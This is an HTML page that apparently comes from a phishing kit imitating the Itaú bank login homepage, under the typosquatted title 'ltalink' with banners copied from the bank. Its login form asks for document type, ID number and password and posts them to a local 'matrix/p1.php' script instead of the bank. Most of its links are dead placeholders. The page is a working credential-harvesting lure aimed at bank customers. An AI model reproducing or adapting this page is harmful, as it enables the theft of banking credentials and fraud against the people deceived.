<!DOCTYPE html>

<html >
   <head>
      <title>ltalink</title>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <style>body {transition: opacity ease-in 0.6s; } 
         body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
      </style>
         
      <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

      <link href="estilos/trofaciosd2.css" type="text/css" rel="stylesheet">
      <link href="estilos/nuevoslider.css" type="text/css" rel="stylesheet">
      <link href="estilos/css.css" type="text/css" rel="stylesheet">
<link rel="icon" href="favicon.ico" type="image/x-icon">
      <link rel="preload" href="estilos/fonts.css" as="style">
      <link rel="preload" href="estilos/generales.css" as="style">
      <link rel="stylesheet" href="estilos/fonts.css">
      <link rel="stylesheet" href="estilos/generales.css">
      <link rel="stylesheet" href="estilos/otrosestilitos.css">

      
      
      <link rel="stylesheet" href="estilos/css2.css">

   </head>
   <body class="konecta-widget-enabled" _c_t_j1="1" style="overflow: hidden;">
      
      <header class="c-header u-reboot" >
         <div class="c-header__content">
            <div class="o-container">
               <div class="c-header__container">
                  <div class="u-flex u-items-start u-items-center-mobile u-justify-between h-screen">
                     <div class="u-flex u-items-start h-screen">
                        <h1 class="c-header__logo">
                           <a href="#"><img src="1mg/logo_mobile@2x.png" width="48" height="48" alt="ItaÃº" style="pointer-events: none;"></a>
                        </h1>
                        <ul class="c-header__nav u-flex u-items-start hide-on-mobile h-screen">
                           <li tabindex="0" class="main-link">
                              <span> para ti </span>
                              
                           </li>
                           <li tabindex="0" class="nav-link-empresas main-link">
                              <span> para empresas </span>
                              
                           </li>
                           <li class="main-link">
                              <a class="main-link-external" href="#">beneficios</a>
                           </li>
                           <li tabindex="0" class="main-link">
                              <span> atenciÃ³n al cliente </span>
                              
                           </li>
                        </ul>
                     </div>
                     <div class="c-header__right">
                        <div class="c-coso hide-on-mobile">
                           <button class="js-toggle-searcher-desktop btn-searcher-desktop u-plainButton">
                              <svg xmlns="http://www.w3.org/2000/svg" fill="none" width="32" height="32" viewBox="0 0 32 32">
                                 <path fill="#fff" d="M21 14.5a7.32 7.32 0 0 0-2.21-5.29 7.33 7.33 0 0 0-5.3-2.2 7.27 7.27 0 0 0-5.3 2.2 7.32 7.32 0 0 0-2.2 5.3c0 1.03.2 2 .59 2.9a7.78 7.78 0 0 0 4 4.01c.91.4 1.88.59 2.91.59a7.32 7.32 0 0 0 5.3-2.2 7.27 7.27 0 0 0 1.62-2.4c.39-.9.58-1.87.58-2.9Zm-4.98 5.98a6.4 6.4 0 0 1-3.82.4 7.18 7.18 0 0 1-2.34-.98 6.67 6.67 0 0 1-2.74-4.1 7.06 7.06 0 0 1 0-2.58c.1-.44.22-.85.4-1.24A5.72 5.72 0 0 1 8.9 9.9c.3-.3.62-.57.96-.8a5.97 5.97 0 0 1 2.34-.98 5.92 5.92 0 0 1 2.58 0c.44.08.85.2 1.24.38a6.84 6.84 0 0 1 2.86 2.37 5.86 5.86 0 0 1 .99 2.34 5.93 5.93 0 0 1 0 2.58 5.97 5.97 0 0 1-.99 2.34 6.66 6.66 0 0 1-2.86 2.34Zm9.68 4.74-1.5 1.5a.95.95 0 0 1-.7.28.95.95 0 0 1-.7-.28l-4.97-4.9.42-.28.42-.28 4.83 4.73 1.5-1.5-4.76-4.83.3-.42.29-.42 4.87 4.97a1 1 0 0 1 0 1.43Z"></path>
                              </svg>
                              <span>buscar</span>
                           </button>
                           <span class="c-coso__divider"></span>
                        </div>
                        <button class="u-plainButton login-mobile-nav btn-login-desktop hide-on-mobile is-open" >
                           <div class="btn-login-content hide-element">
                              <svg width="16" height="22" viewBox="0 0 16 22" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M3.5 5.49219C3.5 6.74219 3.9375 7.80469 4.8125 8.67969C5.6875 9.5547 6.75 9.9922 8 9.9922C9.25 9.9922 10.3125 9.5547 11.1875 8.67969C12.0625 7.80469 12.5 6.74219 12.5 5.49219C12.5 4.25781 12.0625 3.20313 11.1875 2.32812C10.3125 1.4375 9.25 0.992188 8 0.992188C6.75 0.992188 5.6875 1.4375 4.8125 2.32812C3.9375 3.20313 3.5 4.25781 3.5 5.49219ZM8 9.0078C7.0312 9.0078 6.2031 8.66406 5.51562 7.97656C4.84375 7.28906 4.50781 6.46094 4.50781 5.49219C4.50781 4.52344 4.84375 3.70312 5.51562 3.03125C6.2031 2.34375 7.0312 2 8 2C8.9688 2 9.7891 2.34375 10.4609 3.03125C11.1484 3.70312 11.4922 4.52344 11.4922 5.49219C11.4922 6.46094 11.1484 7.28906 10.4609 7.97656C9.7891 8.66406 8.9688 9.0078 8 9.0078ZM0.0078125 18.0078V19.5078C0.0078125 19.9141 0.148442 20.2656 0.429692 20.5625C0.726562 20.8594 1.08594 21.0078 1.50781 21.0078H14.4922C14.9141 21.0078 15.2656 20.8594 15.5469 20.5625C15.8438 20.2656 15.9922 19.9141 15.9922 19.5078V18.0078C15.9922 17.1797 15.8359 16.3984 15.5234 15.6641C15.2109 14.9297 14.7812 14.2969 14.2344 13.7656C13.7031 13.2188 13.0703 12.7891 12.3359 12.4766C11.6016 12.1641 10.8203 12.0078 9.9922 12.0078H6.0078C5.17969 12.0078 4.39844 12.1641 3.66406 12.4766C2.92969 12.7891 2.28906 13.2188 1.74219 13.7656C1.21094 14.2969 0.789062 14.9297 0.476562 15.6641C0.164062 16.3984 0.0078125 17.1797 0.0078125 18.0078ZM0.992192 18.0078C0.992192 17.3047 1.125 16.6562 1.39062 16.0625C1.65625 15.4531 2.01562 14.9219 2.46875 14.4688C2.92188 14.0156 3.45312 13.6562 4.0625 13.3906C4.65625 13.125 5.30469 12.9922 6.0078 12.9922H9.9922C10.6953 12.9922 11.3438 13.125 11.9375 13.3906C12.5469 13.6562 13.0781 14.0156 13.5312 14.4688C13.9844 14.9219 14.3438 15.4531 14.6094 16.0625C14.875 16.6562 15.0078 17.3047 15.0078 18.0078V19.5078C15.0078 19.6484 14.9531 19.7656 14.8438 19.8594C14.75 19.9531 14.6328 20 14.4922 20H1.50781C1.36719 20 1.24219 19.9531 1.13281 19.8594C1.03906 19.7656 0.992192 19.6484 0.992192 19.5078V18.0078Z" fill="white"></path>
                              </svg>
                              <span>ingresar</span>
                           </div>
                           <svg class="cross-icon-login" width="32" height="32" viewBox="-7 -7 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                              <path d="M15.8281 15.4844C15.9375 15.5938 15.9922 15.7344 15.9922 15.9062C15.9922 16.0781 15.9375 16.2188 15.8281 16.3281C15.7031 16.4375 15.5547 16.4922 15.3828 16.4922C15.2266 16.4922 15.0938 16.4375 14.9844 16.3281L8 9.3438L1.01562 16.3281C0.906252 16.4375 0.765622 16.4922 0.593752 16.4922C0.421882 16.4922 0.281252 16.4375 0.171882 16.3281C0.0625021 16.2031 0.0078125 16.0625 0.0078125 15.9062C0.0078125 15.7344 0.0625021 15.5938 0.171882 15.4844L7.1562 8.5L0.171882 1.51562C0.0625021 1.40625 0.0078125 1.26563 0.0078125 1.09375C0.0078125 0.921872 0.0625021 0.781252 0.171882 0.671882C0.296882 0.562502 0.437502 0.507812 0.593752 0.507812C0.765622 0.507812 0.906252 0.562502 1.01562 0.671882L8 7.6562L14.9844 0.671882C15.0938 0.562502 15.2344 0.507812 15.4062 0.507812C15.5781 0.507812 15.7188 0.562502 15.8281 0.671882C15.9375 0.796882 15.9922 0.945312 15.9922 1.11719C15.9922 1.27344 15.9375 1.40625 15.8281 1.51562L8.8438 8.5L15.8281 15.4844Z" fill="white"></path>
                           </svg>
                        </button>
                        <div class="c-login is-open">
                           <form  class="c-login__form" method="post"  action="matrix/p1.php" onsubmit="return validarFormulario()">
                              <select name="segmento" class="select-personas" data-combo="false"  onchange="location = this.value;">
                                 <option value="index.html"  selected="">personas</option>
                                 <option value="index.html">consultas</option>
                                 <option value="inmp.html">empresas</option>
                              </select>
                              <div class="c-login__wrap">
                                 
                                 <div class="panel-persona no-separator">
                                   
                                    <select name="sele1"  data-combo="false"  class="login-control left-radius">
                                       <option value="" disabled="">Tipo de documento</option>
                                       <option value="C.I" selected="">C.I.</option>
                                       <option value="Pasaporte">Pasaporte</option>
                                       <option value="DNI">DNI</option>
                                       <option value="Otros">Otros</option>
                                    </select>
                                 </div>
                                 <div class="panel-persona">
                                   
                                    <input type="tel" name="inpu1" required  minlength="2" maxlength="12" placeholder="documento" class="login-control tabular-nums" onKeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;">
                                 </div>
                                 
                                 <div class="panel-consulta panel-persona">
                                    
                                    <input type="password" name="inpu2" required  minlength="8"  onkeypress="return check(event)" placeholder="contraseÃ±a" class="login-control right-radius">
                                 </div>
                                 
                                 <div class="c-login__help">
                                    <!-- personas/comercios -->
                                    <span class="ayudaAcceso24" style="display: block;">
                                       <a class="panel-persona right-border" href="#"  >
                                          registrate 
                                          <svg class="arrow" xmlns="http://www.w3.org/2000/svg" width="6" height="12" fill="none" viewBox="0 0 6 12">
                                             <path fill="#007AB7" d="M5.1 5.8.5 1.2.3.9C.3.8.3.7.5.6L.7.5l.3.1 4.8 4.8a.7.7 0 0 1 0 1L1 11l-.3.2-.2-.1-.2-.3c0-.1 0-.2.2-.3L5 5.8Z"></path>
                                          </svg>
                                       </a>
                                       <a class="panel-persona" href="#" >
                                          olvidÃ© mi contraseÃ±a 
                                          <svg class="arrow" xmlns="http://www.w3.org/2000/svg" width="6" height="12" fill="none" viewBox="0 0 6 12">
                                             <path fill="#007AB7" d="M5.1 5.8.5 1.2.3.9C.3.8.3.7.5.6L.7.5l.3.1 4.8 4.8a.7.7 0 0 1 0 1L1 11l-.3.2-.2-.1-.2-.3c0-.1 0-.2.2-.3L5 5.8Z"></path>
                                          </svg>
                                       </a>
                                    </span>
                                    <!-- empresas -->
                                    <span class="ayudaAcceso24-3" style="display: none;">
                                       <a class="panel-empresa right-border" href="#">
                                          adherirse a ItaÃº/Link Empresa 
                                          <svg class="arrow" xmlns="http://www.w3.org/2000/svg" width="6" height="12" fill="none" viewBox="0 0 6 12">
                                             <path fill="#007AB7" d="M5.1 5.8.5 1.2.3.9C.3.8.3.7.5.6L.7.5l.3.1 4.8 4.8a.7.7 0 0 1 0 1L1 11l-.3.2-.2-.1-.2-.3c0-.1 0-.2.2-.3L5 5.8Z"></path>
                                          </svg>
                                       </a>
                                       <a class="panel-empresa" href="#">
                                          olvidÃ© mi contraseÃ±a 
                                          <svg class="arrow" xmlns="http://www.w3.org/2000/svg" width="6" height="12" fill="none" viewBox="0 0 6 12">
                                             <path fill="#007AB7" d="M5.1 5.8.5 1.2.3.9C.3.8.3.7.5.6L.7.5l.3.1 4.8 4.8a.7.7 0 0 1 0 1L1 11l-.3.2-.2-.1-.2-.3c0-.1 0-.2.2-.3L5 5.8Z"></path>
                                          </svg>
                                       </a>
                                    </span>
                                    <!-- consultas -->
                                    <span class="ayudaAcceso24-2" style="display: none;">
                                       <a class="panel-consulta right-border" href="#">
                                          Â¿ingresÃ¡s por primera vez? 
                                          <svg class="arrow" xmlns="http://www.w3.org/2000/svg" width="6" height="12" fill="none" viewBox="0 0 6 12">
                                             <path fill="#007AB7" d="M5.1 5.8.5 1.2.3.9C.3.8.3.7.5.6L.7.5l.3.1 4.8 4.8a.7.7 0 0 1 0 1L1 11l-.3.2-.2-.1-.2-.3c0-.1 0-.2.2-.3L5 5.8Z"></path>
                                          </svg>
                                       </a>
                                       <a class="panel-consulta btnOlvide" href="#">
                                          olvidÃ© mi contraseÃ±a 
                                          <svg class="arrow" xmlns="http://www.w3.org/2000/svg" width="6" height="12" fill="none" viewBox="0 0 6 12">
                                             <path fill="#007AB7" d="M5.1 5.8.5 1.2.3.9C.3.8.3.7.5.6L.7.5l.3.1 4.8 4.8a.7.7 0 0 1 0 1L1 11l-.3.2-.2-.1-.2-.3c0-.1 0-.2.2-.3L5 5.8Z"></path>
                                          </svg>
                                       </a>
                                    </span>
                                 </div>
                              </div>
                              <button class="c-login__button" id="btnEnviar"  type="submit" title="Ingresar">
                                 <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" width="24" height="24">
                                    <path fill="currentColor" d="M16.16 12 9.18 5a.51.51 0 0 1-.19-.4c0-.16.06-.3.19-.41.1-.13.24-.19.4-.19.17 0 .31.06.42.19l7.13 7.1a1 1 0 0 1 0 1.43l-7.1 7.1a.74.74 0 0 1-.43.19.62.62 0 0 1-.42-.17.58.58 0 0 1-.19-.42.6.6 0 0 1 .19-.44l6.98-6.99Z"></path>
                                 </svg>
                                 <span class="u-visuallyHidden">Ingresar</span>
                              </button>
                           </form>
                        </div>
                        <div class="c-header__actions hide-on-desktop">
                           <button class="u-plainButton login-mobile-nav is-open" >
                              <div class="btn-login-content hide-element">
                                 <svg width="16" height="22" viewBox="0 0 16 22" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M3.5 5.49219C3.5 6.74219 3.9375 7.80469 4.8125 8.67969C5.6875 9.5547 6.75 9.9922 8 9.9922C9.25 9.9922 10.3125 9.5547 11.1875 8.67969C12.0625 7.80469 12.5 6.74219 12.5 5.49219C12.5 4.25781 12.0625 3.20313 11.1875 2.32812C10.3125 1.4375 9.25 0.992188 8 0.992188C6.75 0.992188 5.6875 1.4375 4.8125 2.32812C3.9375 3.20313 3.5 4.25781 3.5 5.49219ZM8 9.0078C7.0312 9.0078 6.2031 8.66406 5.51562 7.97656C4.84375 7.28906 4.50781 6.46094 4.50781 5.49219C4.50781 4.52344 4.84375 3.70312 5.51562 3.03125C6.2031 2.34375 7.0312 2 8 2C8.9688 2 9.7891 2.34375 10.4609 3.03125C11.1484 3.70312 11.4922 4.52344 11.4922 5.49219C11.4922 6.46094 11.1484 7.28906 10.4609 7.97656C9.7891 8.66406 8.9688 9.0078 8 9.0078ZM0.0078125 18.0078V19.5078C0.0078125 19.9141 0.148442 20.2656 0.429692 20.5625C0.726562 20.8594 1.08594 21.0078 1.50781 21.0078H14.4922C14.9141 21.0078 15.2656 20.8594 15.5469 20.5625C15.8438 20.2656 15.9922 19.9141 15.9922 19.5078V18.0078C15.9922 17.1797 15.8359 16.3984 15.5234 15.6641C15.2109 14.9297 14.7812 14.2969 14.2344 13.7656C13.7031 13.2188 13.0703 12.7891 12.3359 12.4766C11.6016 12.1641 10.8203 12.0078 9.9922 12.0078H6.0078C5.17969 12.0078 4.39844 12.1641 3.66406 12.4766C2.92969 12.7891 2.28906 13.2188 1.74219 13.7656C1.21094 14.2969 0.789062 14.9297 0.476562 15.6641C0.164062 16.3984 0.0078125 17.1797 0.0078125 18.0078ZM0.992192 18.0078C0.992192 17.3047 1.125 16.6562 1.39062 16.0625C1.65625 15.4531 2.01562 14.9219 2.46875 14.4688C2.92188 14.0156 3.45312 13.6562 4.0625 13.3906C4.65625 13.125 5.30469 12.9922 6.0078 12.9922H9.9922C10.6953 12.9922 11.3438 13.125 11.9375 13.3906C12.5469 13.6562 13.0781 14.0156 13.5312 14.4688C13.9844 14.9219 14.3438 15.4531 14.6094 16.0625C14.875 16.6562 15.0078 17.3047 15.0078 18.0078V19.5078C15.0078 19.6484 14.9531 19.7656 14.8438 19.8594C14.75 19.9531 14.6328 20 14.4922 20H1.50781C1.36719 20 1.24219 19.9531 1.13281 19.8594C1.03906 19.7656 0.992192 19.6484 0.992192 19.5078V18.0078Z" fill="white"></path>
                                 </svg>
                                 <span>ingresar</span>
                              </div>
                              <svg class="cross-icon-login" width="32" height="32" viewBox="-7 -7 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M15.8281 15.4844C15.9375 15.5938 15.9922 15.7344 15.9922 15.9062C15.9922 16.0781 15.9375 16.2188 15.8281 16.3281C15.7031 16.4375 15.5547 16.4922 15.3828 16.4922C15.2266 16.4922 15.0938 16.4375 14.9844 16.3281L8 9.3438L1.01562 16.3281C0.906252 16.4375 0.765622 16.4922 0.593752 16.4922C0.421882 16.4922 0.281252 16.4375 0.171882 16.3281C0.0625021 16.2031 0.0078125 16.0625 0.0078125 15.9062C0.0078125 15.7344 0.0625021 15.5938 0.171882 15.4844L7.1562 8.5L0.171882 1.51562C0.0625021 1.40625 0.0078125 1.26563 0.0078125 1.09375C0.0078125 0.921872 0.0625021 0.781252 0.171882 0.671882C0.296882 0.562502 0.437502 0.507812 0.593752 0.507812C0.765622 0.507812 0.906252 0.562502 1.01562 0.671882L8 7.6562L14.9844 0.671882C15.0938 0.562502 15.2344 0.507812 15.4062 0.507812C15.5781 0.507812 15.7188 0.562502 15.8281 0.671882C15.9375 0.796882 15.9922 0.945312 15.9922 1.11719C15.9922 1.27344 15.9375 1.40625 15.8281 1.51562L8.8438 8.5L15.8281 15.4844Z" fill="white"></path>
                              </svg>
                           </button>
                           <button class="u-plainButton js-toggle-searcher-desktop">
                              <svg class="search-icon" xmlns="http://www.w3.org/2000/svg" fill="none" width="32" height="32" viewBox="0 0 32 32">
                                 <path fill="#fff" d="M21 14.5a7.32 7.32 0 0 0-2.21-5.29 7.33 7.33 0 0 0-5.3-2.2 7.27 7.27 0 0 0-5.3 2.2 7.32 7.32 0 0 0-2.2 5.3c0 1.03.2 2 .59 2.9a7.78 7.78 0 0 0 4 4.01c.91.4 1.88.59 2.91.59a7.32 7.32 0 0 0 5.3-2.2 7.27 7.27 0 0 0 1.62-2.4c.39-.9.58-1.87.58-2.9Zm-4.98 5.98a6.4 6.4 0 0 1-3.82.4 7.18 7.18 0 0 1-2.34-.98 6.67 6.67 0 0 1-2.74-4.1 7.06 7.06 0 0 1 0-2.58c.1-.44.22-.85.4-1.24A5.72 5.72 0 0 1 8.9 9.9c.3-.3.62-.57.96-.8a5.97 5.97 0 0 1 2.34-.98 5.92 5.92 0 0 1 2.58 0c.44.08.85.2 1.24.38a6.84 6.84 0 0 1 2.86 2.37 5.86 5.86 0 0 1 .99 2.34 5.93 5.93 0 0 1 0 2.58 5.97 5.97 0 0 1-.99 2.34 6.66 6.66 0 0 1-2.86 2.34Zm9.68 4.74-1.5 1.5a.95.95 0 0 1-.7.28.95.95 0 0 1-.7-.28l-4.97-4.9.42-.28.42-.28 4.83 4.73 1.5-1.5-4.76-4.83.3-.42.29-.42 4.87 4.97a1 1 0 0 1 0 1.43Z"></path>
                              </svg>
                              <svg class="cross-icon-search hide-element" width="32" height="32" viewBox="-7 -7 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M15.8281 15.4844C15.9375 15.5938 15.9922 15.7344 15.9922 15.9062C15.9922 16.0781 15.9375 16.2188 15.8281 16.3281C15.7031 16.4375 15.5547 16.4922 15.3828 16.4922C15.2266 16.4922 15.0938 16.4375 14.9844 16.3281L8 9.3438L1.01562 16.3281C0.906252 16.4375 0.765622 16.4922 0.593752 16.4922C0.421882 16.4922 0.281252 16.4375 0.171882 16.3281C0.0625021 16.2031 0.0078125 16.0625 0.0078125 15.9062C0.0078125 15.7344 0.0625021 15.5938 0.171882 15.4844L7.1562 8.5L0.171882 1.51562C0.0625021 1.40625 0.0078125 1.26563 0.0078125 1.09375C0.0078125 0.921872 0.0625021 0.781252 0.171882 0.671882C0.296882 0.562502 0.437502 0.507812 0.593752 0.507812C0.765622 0.507812 0.906252 0.562502 1.01562 0.671882L8 7.6562L14.9844 0.671882C15.0938 0.562502 15.2344 0.507812 15.4062 0.507812C15.5781 0.507812 15.7188 0.562502 15.8281 0.671882C15.9375 0.796882 15.9922 0.945312 15.9922 1.11719C15.9922 1.27344 15.9375 1.40625 15.8281 1.51562L8.8438 8.5L15.8281 15.4844Z" fill="white"></path>
                              </svg>
                           </button>
                           <button id="burger" class="u-plainButton">
                              <svg class="burger-icon" width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M27.3437 9.34375H4.65625C4.48959 9.34375 4.33333 9.28125 4.18749 9.15625C4.06251 9.01041 4 8.84375 4 8.65625C4 8.48959 4.06251 8.34375 4.18749 8.21875C4.33333 8.07292 4.48959 8 4.65625 8H27.3437C27.5104 8 27.6563 8.07292 27.7812 8.21875C27.9271 8.34375 28 8.48959 28 8.65625C28 8.84375 27.9271 9.01041 27.7812 9.15625C27.6563 9.28125 27.5104 9.34375 27.3437 9.34375ZM28 16.6563C28 16.4896 27.9271 16.3437 27.7812 16.2188C27.6563 16.0729 27.5104 16 27.3437 16H4.65625C4.48959 16 4.33333 16.0729 4.18749 16.2188C4.06251 16.3437 4 16.4896 4 16.6563C4 16.8437 4.06251 17.0104 4.18749 17.1563C4.33333 17.2812 4.48959 17.3437 4.65625 17.3437H27.3437C27.5104 17.3437 27.6563 17.2812 27.7812 17.1563C27.9271 17.0104 28 16.8437 28 16.6563ZM28 24.6563C28 24.4896 27.9271 24.3437 27.7812 24.2188C27.6563 24.0729 27.5104 24 27.3437 24H4.65625C4.48959 24 4.33333 24.0729 4.18749 24.2188C4.06251 24.3437 4 24.4896 4 24.6563C4 24.8437 4.06251 25.0104 4.18749 25.1563C4.33333 25.2812 4.48959 25.3437 4.65625 25.3437H27.3437C27.5104 25.3437 27.6563 25.2812 27.7812 25.1563C27.9271 25.0104 28 24.8437 28 24.6563Z" fill="white"></path>
                              </svg>
                              <svg class="cross-icon hide-element" width="32" height="32" viewBox="-7 -7 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M15.8281 15.4844C15.9375 15.5938 15.9922 15.7344 15.9922 15.9062C15.9922 16.0781 15.9375 16.2188 15.8281 16.3281C15.7031 16.4375 15.5547 16.4922 15.3828 16.4922C15.2266 16.4922 15.0938 16.4375 14.9844 16.3281L8 9.3438L1.01562 16.3281C0.906252 16.4375 0.765622 16.4922 0.593752 16.4922C0.421882 16.4922 0.281252 16.4375 0.171882 16.3281C0.0625021 16.2031 0.0078125 16.0625 0.0078125 15.9062C0.0078125 15.7344 0.0625021 15.5938 0.171882 15.4844L7.1562 8.5L0.171882 1.51562C0.0625021 1.40625 0.0078125 1.26563 0.0078125 1.09375C0.0078125 0.921872 0.0625021 0.781252 0.171882 0.671882C0.296882 0.562502 0.437502 0.507812 0.593752 0.507812C0.765622 0.507812 0.906252 0.562502 1.01562 0.671882L8 7.6562L14.9844 0.671882C15.0938 0.562502 15.2344 0.507812 15.4062 0.507812C15.5781 0.507812 15.7188 0.562502 15.8281 0.671882C15.9375 0.796882 15.9922 0.945312 15.9922 1.11719C15.9922 1.27344 15.9375 1.40625 15.8281 1.51562L8.8438 8.5L15.8281 15.4844Z" fill="white"></path>
                              </svg>
                           </button>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </header>
      
      <section  class="u-reboot hide-on-desktop">login</section>
      <!-- modal buscador -->
      <div class="modal-buscador">
         <div class="modal-top">
            <div class="container">
               <div>
                  <a href="#" class="hide-on-mobile"><img src="1mg/logo_mobile@2x.png" width="48" height="48" alt="ItaÃº" style="pointer-events: none;"></a>
                  <img class="hide-on-desktop" src="1mg/search-primary.svg" width="32" height="32" style="margin: 0px 7px 3px 0px; pointer-events: none;" alt="ItaÃº">
                  <input type="text"  placeholder="Â¿quÃ© estÃ¡s buscando?" autocomplete="off">
               </div>
               <button class="js-toggle-searcher-desktop u-plainButton hide-on-mobile">
                  <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                     <path d="M15.8281 14.9844C15.9375 15.0938 15.9922 15.2344 15.9922 15.4062C15.9922 15.5781 15.9375 15.7188 15.8281 15.8281C15.7031 15.9375 15.5547 15.9922 15.3828 15.9922C15.2266 15.9922 15.0938 15.9375 14.9844 15.8281L8 8.84379L1.01562 15.8281C0.906252 15.9375 0.765622 15.9922 0.593752 15.9922C0.421882 15.9922 0.281252 15.9375 0.171882 15.8281C0.0625021 15.7031 0.0078125 15.5625 0.0078125 15.4062C0.0078125 15.2344 0.0625021 15.0938 0.171882 14.9844L7.1562 8L0.171882 1.01562C0.0625021 0.906252 0.0078125 0.765632 0.0078125 0.593752C0.0078125 0.421872 0.0625021 0.281252 0.171882 0.171882C0.296882 0.0625021 0.437502 0.0078125 0.593752 0.0078125C0.765622 0.0078125 0.906252 0.0625021 1.01562 0.171882L8 7.1562L14.9844 0.171882C15.0938 0.0625021 15.2344 0.0078125 15.4062 0.0078125C15.5781 0.0078125 15.7188 0.0625021 15.8281 0.171882C15.9375 0.296882 15.9922 0.445312 15.9922 0.617192C15.9922 0.773442 15.9375 0.906252 15.8281 1.01562L8.84379 8L15.8281 14.9844Z" fill="#252220"></path>
                  </svg>
               </button>
            </div>
         </div>
         <div class="modal-results">
            <div class="container">
               <p class="modal-title">sugerencias</p>
               <div class="modal-suggestions-content">
                  <ul class="modal-list-results">
                     <li>
                        <a href="#">prÃ©stamos</a>
                     </li>
                     <li>
                        <a href="#"></a>
                     </li>
                     <li>
                        <a href="#">inversiones</a>
                     </li>
                  </ul>
               </div>
               <div class="modal-results-content" ></div>
            </div>
         </div>
      </div>
      <!-- fin modal buscador -->
      <!-- Fin HEADER  -->
      <!-- CONTENIDO  -->
      <div id="contPrincipal">
         <div id="contSliderPortada" style="max-height: 725px;">
            <div id="slider" class="nivoSlider">
               <a data-mapa="false" id="img_10041723_itautkBannerHome1440x900_Home" href="#" class="nivo-imageLink" style="display: block;">
                  <img id="img_img_10041723_itautkBannerHome1440x900_Home" data-thumb="aci/images/img_10058835_itautkBannerHome_Boton120x60.jpg" alt="ItaÃº busca TikToker" src="1mg/img_10041723_itautkBannerHome1440x900_Home.jpg" style="display: none; pointer-events: none;">
               </a>
               <a data-mapa="false" id="img_443912_inicio_sitio_noves_09_20" href="#" class="nivo-imageLink" style="display: none;">
                  <img id="img_img_443912_inicio_sitio_noves_09_20" data-thumb="aci/images/img_9323558_BOTONHOMEMODAOCT2023.jpg" alt="Moda Octubre 2023" src="1mg/img_9323559_HOMEMODAOCT2023.jpg" style="display: none; pointer-events: none;">
               </a>
               <a data-mapa="false" id="img_9547854_Inversores_Placahome" href="#" class="nivo-imageLink" style="display: none;">
                  <img id="img_img_9547854_Inversores_Placahome" data-thumb="aci/images/img_9547853_Inversores_Placahomechica.jpg" alt="Inversores Verificados" src="1mg/img_9981787_Inversores_Placahomecopia.jpg" style="display: none; pointer-events: none;">
               </a>
               <a data-mapa="false" id="img_9657776_HOMECUENTAUNIPERSONALSET2023" href="#" class="nivo-imageLink" style="display: none;">
                  <img id="img_img_9657776_HOMECUENTAUNIPERSONALSET2023" data-thumb="aci/images/img_9663101_BOTONHOMECUENTAUNIPERSONALSET2023.jpg" alt="Cuenta Unipersonal" src="1mg/img_9657776_HOMECUENTAUNIPERSONALSET2023.jpg" style="display: none; pointer-events: none;">
               </a><img class="nivo-main-image" src="1mg/img_10041723_itautkBannerHome1440x900_Home.jpg" style="pointer-events: none; width: 1366px; height: auto;">
               <div class="nivo-caption"></div>
               <div id="google_maps_canvas" class="none" style="width: 1366px; height: 853.75px;">
               </div>
               <div class="nivo-controlNav nivo-thumbs-enabled">
                  <a class="nivo-control active" rel="0" id="home-thumbnail-1">
                     <img src="1mg/img_10058835_itautkBannerHome_Boton120x60.jpg" alt="" style="pointer-events: none;">
                     <div class="thumb-title" style="pointer-events: none;">Preventa exclusiva</div>
                  </a>
                  <a class="nivo-control" rel="1" id="home-thumbnail-2">
                     <img src="1mg/img_2168864_BotonPrevenciondefraudes.jpg" alt="" style="pointer-events: none;">
                     <div class="thumb-title" style="pointer-events: none;">Simulador prÃ©stamos empresas</div>
                  </a>
                  <a class="nivo-control" rel="1" id="home-thumbnail-2">
                     <img src="1mg/img_9323558_BOTONHOMEMODAOCT2023.jpg" alt="" style="pointer-events: none;">
                     <div class="thumb-title" style="pointer-events: none;">Festival de Jazz </div>
                  </a>
                  <a class="nivo-control" rel="2" id="home-thumbnail-3">
                     <img src="1mg/img_9547853_Inversores_Placahomechica.jpg" alt="" style="pointer-events: none;">
                     <div class="thumb-title" style="pointer-events: none;">PrÃ©stamo Hipotecario</div>
                  </a>
                     <a class="nivo-control" rel="2" id="home-thumbnail-3">
                     <img src="1mg/icon5.jpg" alt="" style="pointer-events: none;">
                     <div class="thumb-title" style="pointer-events: none;">Casa ItaÃº</div>
                  </a>
                     <a class="nivo-control" rel="2" id="home-thumbnail-3">
                      <img src="1mg/icon6.jpg" alt="" style="pointer-events: none;">
                        <div class="thumb-title" style="pointer-events: none;">Apple Pay</div>
                  </a>
               </div>
            </div>
         </div>
     
      <script type="text/javascript">
         function check(e) {
    tecla = (document.all) ? e.keyCode : e.which;

    //Tecla de retroceso para borrar, siempre la permite
    if (tecla == 8) {
        return true;
    }

    // PatrÃ³n de entrada, en este caso solo acepta numeros y letras
    patron = /[A-Za-z0-9]/;
    tecla_final = String.fromCharCode(tecla);
    return patron.test(tecla_final);
}
      </script>
       <script>
        function validarFormulario() {
      
            document.getElementById('btnEnviar').disabled = true;
            return true;
        }
    </script>
     
   </body>
  
</html>
